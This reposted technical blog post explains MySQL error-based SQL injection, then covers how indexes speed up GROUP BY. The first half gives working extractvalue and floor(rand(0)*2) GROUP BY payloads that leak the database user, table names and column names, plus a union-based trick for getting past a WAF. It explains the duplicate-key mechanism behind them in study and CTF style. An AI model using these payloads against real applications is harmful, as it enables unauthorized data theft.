Building Indexes for GROUP BY

Reposted

mob6454cc79ab13 2024-07-29 20:20:36


Key points

Principles (GROUP BY and the rand function)

Further thoughts: indexes and GROUP BY statements

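Key points

1. When the server has not disabled the display of error messages, error-based MySQL injection becomes an option.
2. If the injected subquery returns NULL and its result is joined with concat, no error is triggered, so the attack appears to have "failed". For example: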

select (extractvalue(1, concat(0x7e,(  select group_concat(id) from test  )))) #
Select count(*),concat(  (select group_concat(id) from test ) ,floor(rand()*2))x from information_schema.tables group by x #

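Reason: if the queried table "test" happens to be empty, the subquery "(select group_concat(id) from test)" returns NULL.

When concat joins a NULL with a non-NULL string, it returns NULL directly, so the statements are effectively executed as follows and no error is raised.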

Select count(*),(null)x from information_schema.tables group by x;
select extractvalue(1, null ) #
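The NULL propagation described above can be reproduced without a MySQL server. The following is a minimal sketch that uses Python's built-in sqlite3 module as a stand-in, on the assumption that SQLite behaves like MySQL in these two respects: group_concat over an empty table yields NULL, and concatenating anything with NULL yields NULL. SQLite's `||` operator is used in place of MySQL's concat, and the helper name `probe` is purely illustrative.

```python
import sqlite3

# In-memory SQLite database standing in for MySQL (an assumption of this sketch).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE test (id INTEGER)")

def probe(connection):
    """Return (aggregate, concatenated) for the current contents of test."""
    agg = connection.execute(
        "SELECT group_concat(id) FROM test").fetchone()[0]
    # '||' is SQLite's concatenation operator, used here instead of concat().
    joined = connection.execute(
        "SELECT '~' || (SELECT group_concat(id) FROM test)").fetchone()[0]
    return agg, joined

empty_result = probe(conn)            # table is still empty here
conn.executemany("INSERT INTO test VALUES (?)", [(1,), (2,)])
filled_result = probe(conn)           # table now has two rows

print(empty_result)   # both elements are None, i.e. SQL NULL
print(filled_result)  # a non-NULL string prefixed with '~'
```

With the empty table, the whole concatenated expression collapses to NULL, so nothing is left to provoke an error message.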

3. When using error-based injection built on group by and rand, the queried table must contain at least two rows. For example:

Select count(*),concat((select user()),floor(rand()*2))x from test group by x
# First method
Select count(*),concat((select user()),floor(rand(0)*2))x from test group by x
# Second method(Recommended)

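The two methods differ in the argument passed to rand, that is, the seed.

Without an argument, rand returns a pseudo-random value. With an argument, rand uses it as the seed, generates a "replayable" pseudo-random sequence, and returns values drawn from that sequence.

With the second form, an error is guaranteed when the test table has 3 or more rows; otherwise no error occurs.

With the first form, no error can occur when test has only 1 row. When it has more than 1 row, there is still some probability that no error is triggered; the details are discussed below.

4. Because the length of the message echoed by an error is limited, group_concat must be combined with keywords such as limit and offset to retrieve the information piece by piece. For example:

Getting table names: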

select (extractvalue(1, concat(0x7e,(  select group_concat(table_name) from ( select (table_name) from information_schema.tables limit 2 offset 6)x  )))) #

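(Added 2021/05/18) When information_schema is filtered by a WAF, consider the union select based technique for reading data without column names:

select aa from (select "aa","bb" union select * from test)a
# Reading without column names, based on union select

Getting column names: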

select extractvalue(1, concat(0x7e,(  select group_concat(column_name) from information_schema.columns where table_name='FLAG_TABLE'  )))#

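Principles (GROUP BY and the rand function)

0. Some properties of rand(seed)

When no argument is given, rand() returns an arbitrary random value. I could not find documentation describing in detail how the function generates its pseudo-random numbers, so I will not go further into it.

When an argument is given, rand() draws values from a "replayable" pseudo-random sequence and returns them.

The "replayable" property shows in the following statement: calls to rand() with the same seed produce the same random sequence: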

select rand(3),rand(1),rand(1),rand(3),rand(),rand()
# 0.9057697559760601	0.40540353712197724	0.40540353712197724	0.9057697559760601	0.06270002020774411	0.7339589788894718

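The "sequence" property shows in the following statement: when rand(seed) is evaluated for each of several rows of a table, the result is a reproducible random sequence rather than the same value on every row: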

select rand(3),rand(3) from test;
# 0.9057697559760601	0.9057697559760601
# 0.37307905813034536	0.37307905813034536
# 0.14808605345719125	0.14808605345719125

This is how the official documentation puts it... though I did not fully understand it:

If an integer argument N
With a constant initializer argument, the seed is initialized once when the statement is prepared, prior to execution.
With a nonconstant initializer argument (such as a column name), the seed is initialized with the value for each invocation of RAND().
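To make the "replayable sequence" behaviour concrete, here is a small Python model of a seeded generator. The constants and update rule are written from memory of MySQL's source (the seed expansion in item_func.cc and the generator in my_rnd.c), so treat them as an assumption rather than a specification; the class name `SeededRand` and the helper `floor_sequence` are hypothetical. Under that assumption the model reproduces the rand(1) and rand(3) values quoted above.

```python
import math

MAX_VALUE = 0x3FFFFFFF  # modulus, as recalled from MySQL's my_rnd.c (assumption)

class SeededRand:
    """Hypothetical model of RAND(N) for a constant integer seed N."""

    def __init__(self, seed):
        # Seed expansion as recalled from MySQL's source (assumption);
        # the masks mimic the truncation to unsigned 32-bit integers.
        self.seed1 = ((seed * 0x10001 + 55555555) & 0xFFFFFFFF) % MAX_VALUE
        self.seed2 = ((seed * 0x10000001) & 0xFFFFFFFF) % MAX_VALUE

    def next(self):
        # Two coupled linear congruential updates per call.
        self.seed1 = (self.seed1 * 3 + self.seed2) % MAX_VALUE
        self.seed2 = (self.seed1 + self.seed2 + 33) % MAX_VALUE
        return self.seed1 / MAX_VALUE

def floor_sequence(seed, count, scale=2):
    """Model of floor(rand(seed)*scale) evaluated `count` times in a row."""
    gen = SeededRand(seed)
    return [math.floor(gen.next() * scale) for _ in range(count)]

# Same seed, same first value: the "replayable" property.
print(SeededRand(3).next(), SeededRand(3).next())
# One generator advanced several times: the "sequence" property.
print(floor_sequence(0, 6))  # [0, 1, 1, 0, 1, 1] under this model
```

A constant seed fixes the whole sequence once, which is why every run of a statement using rand(0) sees the same values in the same order.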

1. Error-based injection built on group by and rand

The explanation given at https://bugs.mysql.com/bug.php?id=8652 is very concise:

This problem happens because in a GROUP BY query a RAND expression can be evaluated several times for the same row, every time returning a new result.

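Using group by together with an aggregate function (sum, count) is a necessary condition for the same row to be processed more than once.

The w3cschool tutorial on Group By likewise only mentions briefly that group by groups the table, generates summary rows, and returns them as the query result.

To explain how this kind of error-based injection works, my original plan was to follow the "group_key" in the error message and look into how group by is implemented, or to use the explain statement and the process_list table to see whether any details of the execution could be observed.

Unfortunately that led nowhere, so I tried guessing at the underlying mechanism of group by instead, and observed the following: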

# test has only 5 rows here, so the probability of an error is tiny (statement 1)
select count(*), concat(user(), floor( rand()*2000) ) x from test group by x;
# information_schema.tables has 283 rows here, so the probability of an error is high, as in a birthday attack (statement 2)
select count(*), concat(user(), floor( rand()*2000) ) x from information_schema.tables group by x;

# moderate probability of an error (statement 3)
select count(*), concat(user(), floor( rand()*2) ) x from test group by x;
# moderate probability of an error (statement 4)
select count(*), concat(user(), floor( rand()*2) ) x from information_schema.tables group by x;
# moderate probability of an error (statement 5)
select count(*), concat(user(), floor( rand()*200000) ) x from information_schema.tables group by x;

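Combined with the "multiple evaluation" mentioned earlier, ~~my guess was that the summary rows generated by group by contain a "group_key" column whose values are unique and may be null.~~

...Later I found a post devoted to SQL error-based injection, "MYSQL报错注入的一点总结" (a summary of MySQL error-based injection), and it turned out my guess was slightly off, so I will relay the mechanism described in that post instead.

According to that post, error-based injection built on rand and Group By raises its error as follows:

1. Create a virtual table whose fields correspond to the field x named in group by (which is unique) and to the value of the aggregate function.
2. Iterate over each row of the original table, compute the value of field x, and check whether that value already exists in the virtual table (this evaluates rand once).
3. If it already exists, update the corresponding aggregate value directly; otherwise insert value into the virtual table (value is recomputed at this point, so rand is evaluated a second time).
4. If the value produced in step 3 already exists in the virtual table, an error is raised.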

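The post explains the rand(0) case very clearly: floor(rand(0)*2) produces the sequence 0 1 1 0 1 1, and the Group By statement proceeds by the rules above as follows:

Row 1: value evaluates to 0, which is not in field x of the virtual table, so an insert is needed. The value actually inserted, however, is 1 (step 3 above).
Row 2: value evaluates to 1, which is already in field x, so only the aggregate value is updated.
Row 3: value evaluates to 0, which is not in field x, so an insert is needed; the value actually inserted is 1, which raises a duplicate primary key error.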
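The four steps and the row-by-row walk-through above can be sketched as a short Python simulation. This models only the mechanism as relayed from the cited post, not MySQL's actual implementation; the function name `first_duplicate_row` and the use of a dict as the "virtual table" are illustrative choices.

```python
from itertools import chain, cycle

def first_duplicate_row(values, row_count):
    """Return the 1-based row at which the insert collides, or None.

    `values` yields successive evaluations of the group by expression.
    """
    stream = iter(values)
    temp_table = {}                   # group key -> count(*)
    for row in range(1, row_count + 1):
        key = next(stream)            # step 2: evaluate and look up
        if key in temp_table:
            temp_table[key] += 1      # step 3: key exists, update the aggregate
            continue
        key = next(stream)            # step 3: re-evaluated for the insert
        if key in temp_table:
            return row                # step 4: duplicate key, error raised
        temp_table[key] = 1
    return None

rand0 = [0, 1, 1, 0, 1, 1]            # floor(rand(0)*2) as quoted above
print(first_duplicate_row(rand0, 3))  # 3: the error appears on the third row
print(first_duplicate_row(rand0, 2))  # None: two rows are not enough
# A sequence starting 0 0 1 1 fills both keys cleanly, so no error ever occurs.
print(first_duplicate_row(chain([0, 0, 1, 1], cycle([0, 1])), 50))  # None
```

The key detail is that a miss consumes two values from the sequence (lookup, then insert) while a hit consumes only one.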

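Now look back at the injection statements based on rand() rather than rand(0). Statements 3 and 4 have only a moderate probability of erroring because once the sequence generated by floor(rand()*2) begins with something like 0 0 1 1 or 0 1 0 0, no error will occur regardless of how many rows the table has: every possible value of field x has already been inserted into the virtual table correctly.

Statement 2 has a high probability of erroring for a reason closer to a "collision attack": given that step 3 of the group by procedure is triggered, the recomputed random value happens to equal a value of field x already in the virtual table.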
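The relative error rates of statements 1 to 5 can be estimated with a small Monte Carlo experiment. The sketch below assumes the lookup-then-reinsert mechanism described above and treats floor(rand()*N) as a uniform draw from 0..N-1; the function names, the trial count, and the fixed seed are arbitrary choices made for reproducibility.

```python
import random

def errors_once(rng, row_count, buckets):
    """Simulate one run of the statement; True if a duplicate insert occurs."""
    seen = set()
    for _ in range(row_count):
        if rng.randrange(buckets) in seen:   # lookup hit: aggregate updated
            continue
        key = rng.randrange(buckets)         # miss: value re-evaluated for insert
        if key in seen:
            return True                      # duplicate key error
        seen.add(key)
    return False

def error_rate(row_count, buckets, trials=1000, seed=1):
    """Fraction of simulated runs that end in an error."""
    rng = random.Random(seed)
    hits = sum(errors_once(rng, row_count, buckets) for _ in range(trials))
    return hits / trials

cases = [
    ("statement 1", 5, 2000),
    ("statement 2", 283, 2000),
    ("statement 3", 5, 2),
    ("statement 4", 283, 2),
    ("statement 5", 283, 200000),
]
for label, rows, buckets in cases:
    print(label, error_rate(rows, buckets))
```

Under this model the two-bucket case has a closed form: after the first row, each further row stays undecided with probability 1/2, errors with probability 1/4, and becomes permanently safe with probability 1/4, giving an error probability of (1/2)(1 - (1/2)^(n-1)) for n rows. That is why statements 3 and 4 hover just below one half however large the table is.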

2. extractvalue

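Error-based injection via extractvalue is simpler in principle: when an invalid XPath argument is submitted, the echoed error message can be used to obtain sensitive information.

Note that it also has other (less common) attack surfaces, such as XPath (boolean) injection. See https://dev.mysql.com/doc/refman/8.0/en/xml-functions.html

Further thoughts: indexes and GROUP BY statements

The discussion of error-based injection above partly reveals how group by works. That raises a question: does MySQL have a mechanism that uses indexes to make group by faster? After all, creating a temporary table and then scanning the original table row by row, updating or inserting one row at a time, is rather crude.

It does. The MySQL documentation divides the index-based methods for speeding up Group By into two kinds, Loose Index Scan and Tight Index Scan, the former being preferable to the latter. Their characteristics are: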

Loose Index Scan
This access method considers only a fraction of the keys in an index, so it is called a Loose Index Scan.
a Loose Index Scan reads as many keys as the number of groups (when no WHERE clause)
looks up the first key of each group that satisfies the range conditions, and again reads the smallest possible number of keys(WHERE clause contains range predicates)
If Loose Index Scan is applicable to a query, the EXPLAIN output shows Using index for group-by in the Extra column.

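So LIS gains its efficiency from not having to visit every key in the index.

As for what "the keys in an index" refers to, my own understanding is that a key is the identifier of a row in the table, stored in the index in some order.

If the index is a B+ tree, the keys are the data stored in the leaf nodes (the exact layout depends on whether the indexed field is the primary key). Corrections are welcome if this is wrong.

If a query we write does not meet the conditions for Loose Index Scan, it may still qualify for Tight Index Scan.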

Tight Index Scan
may be either a full index scan or a range index scan
the grouping operation is performed only after all keys that satisfy the range conditions have been found

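If the query does not meet the conditions for Tight Index Scan either, the database executes Group By by building a temporary table, which is comparatively inefficient.

In short, for SQL queries to perform well we need to build suitable indexes and write the statements so that they can take advantage of those indexes.

The following is an SQL experiment on group by queries: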
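The difference between the two scans can be illustrated with a toy model. The sketch below represents an index as a sorted Python list of (group, value) keys and uses bisect to stand in for B-tree navigation; it is only meant to show why a loose scan reads about as many keys as there are groups while a tight scan reads every key, and it is not how MySQL is implemented. All names are hypothetical.

```python
from bisect import bisect_right

def loose_scan_min(index_keys):
    """MIN(value) per group, jumping straight to the first key of each group."""
    groups = [group for group, _ in index_keys]  # stands in for B-tree navigation
    result, keys_read, pos = {}, 0, 0
    while pos < len(index_keys):
        group, value = index_keys[pos]
        result[group] = value                    # first key of a group is its minimum
        keys_read += 1
        pos = bisect_right(groups, group, pos)   # skip the rest of this group
    return result, keys_read

def tight_scan_count(index_keys):
    """COUNT(*) per group, reading every key in index order."""
    result, keys_read = {}, 0
    for group, _ in index_keys:
        result[group] = result.get(group, 0) + 1
        keys_read += 1
    return result, keys_read

# A toy composite index on (group, value), kept in sorted order.
index_keys = sorted([(3, "d"), (1, "b"), (2, "c"), (1, "a"), (3, "f"), (3, "e")])
print(loose_scan_min(index_keys))    # ({1: 'a', 2: 'c', 3: 'd'}, 3)
print(tight_scan_count(index_keys))  # ({1: 2, 2: 1, 3: 3}, 6)
```

In both cases the sorted order of the index removes the need for a temporary table, because all keys of one group are adjacent; the loose scan additionally skips the keys it does not need.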

desc test_user;
#id	bigint(20)	NO	PRI		auto_increment
#username	varchar(50)	YES	MUL		
#email	varchar(30)	YES		
#password	varchar(32)	YES		

show index from test_user;
#test_user	0	PRIMARY	1	id	A	1000000				BTREE		
#test_user	1	index_name	1	username	A	1000000			YES	BTREE		
#test_user	1	id_uname	1	id	A	1000000				BTREE		
#test_user	1	id_uname	2	username	A	1000000			YES	BTREE		


# 1. Loose Index Scan?
explain select count(distinct username) from test_user group by id;
# 1	SIMPLE	test_user		range	PRIMARY,id_uname	id_uname	161		1000001	100.00	Using index for group-by (scanning)

# 2. 
explain select count(username) from test_user group by id;
# 1	SIMPLE	test_user		index	PRIMARY,id_uname	id_uname	161		1000000	100.00	Using index

# 3. 
explain select username,id from test_user group by id,username;
# 1	SIMPLE	test_user		index	id_uname	id_uname	161		1000000	100.00	Using index

# 4. 
explain select username,id from test_user group by username,id;
# 1	SIMPLE	test_user		index	id_uname	id_uname	161		1000000	100.00	Using index; Using filesort


# 5. group by using temporary table
explain select count(*) from test_user group by id%100;
# 1	SIMPLE	test_user		index	PRIMARY,id_uname	PRIMARY	8		1000000	100.00	Using index; Using temporary; Using filesort

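Index structure: the table has 3 indexes in total: the primary key index (on id), the index on username, and the composite index on id and username.

Statement 1: "Using index for group-by" in the Extra column shows that a loose index scan was used, but I do not know what "(scanning)" means.

Statement 2: a different aggregate function prevents the query from using a loose index scan; see the MySQL documentation for the exact conditions.

Statement 3: for some reason it did not trigger a loose index scan as the documentation describes. My guess is that the optimizer considered a loose scan unnecessary?

Statement 4: when the field order after group by differs from the field order in the composite index, the group by result must be sorted (Using filesort). This is because the group by in statement 4 has to sort the result with username as the primary sort key, and the index cannot help with that.

Statement 5: group by is executed with a temporary table, which is inefficient and should be avoided where possible.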
